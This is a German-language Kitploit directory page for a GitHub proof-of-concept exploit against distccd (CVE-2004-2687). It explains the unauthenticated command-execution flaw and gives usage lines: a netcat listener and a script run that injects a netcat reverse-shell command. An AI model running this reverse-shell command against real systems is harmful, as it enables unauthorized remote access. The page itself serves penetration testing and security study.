Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
distccd_rce_CVE-2004-2687 | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/distccd_rce_cve-2004-2687
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubh3x0v3rl0rd/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Upgrade auf Python3

Übersicht

Diese Repository enthält einen Proof-of-Concept (PoC) Exploit für die als CVE-2004-2687 identifizierte distccd-Sicherheitslücke. Die Schwachstelle existiert im distccd-Daemon, der Teil des verteilten C/C++-Kompilierungssystems distcc ist. Bei falscher Konfiguration ermöglicht distccd Remote-Angreifern, ohne Authentifizierung beliebige Befehle auf dem Server auszuführen. Schwachstellendetails

distcc wurde entwickelt, um Kompilierungsaufgaben auf mehrere Rechner zu verteilen, um den Build-Prozess zu beschleunigen. Wenn der distccd-Daemon jedoch nicht ordnungsgemäß gesichert ist, setzt er eine Remote-Code-Ausführungs-Sicherheitslücke (RCE) frei. Dies geschieht, weil der Daemon auf einem Netzwerkport lauscht und Befehle von jedem Client akzeptiert, sodass diese Shell-Befehle auf dem Server als der Benutzer, der den Daemon ausführt, ausführen können.

Die Schwachstelle wurde als CVE-2004-2687 eingestuft und betrifft distccd-Versionen vor 3.1. Bei Ausnutzung kann ein Angreifer Shell-Zugriff auf das anfällige System erlangen, was zu einer potenziellen Kompromittierung des gesamten Systems führen kann.

root@kitploit:~
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

Schwachstelle :

image

Exploit :

image

Tool herunterladen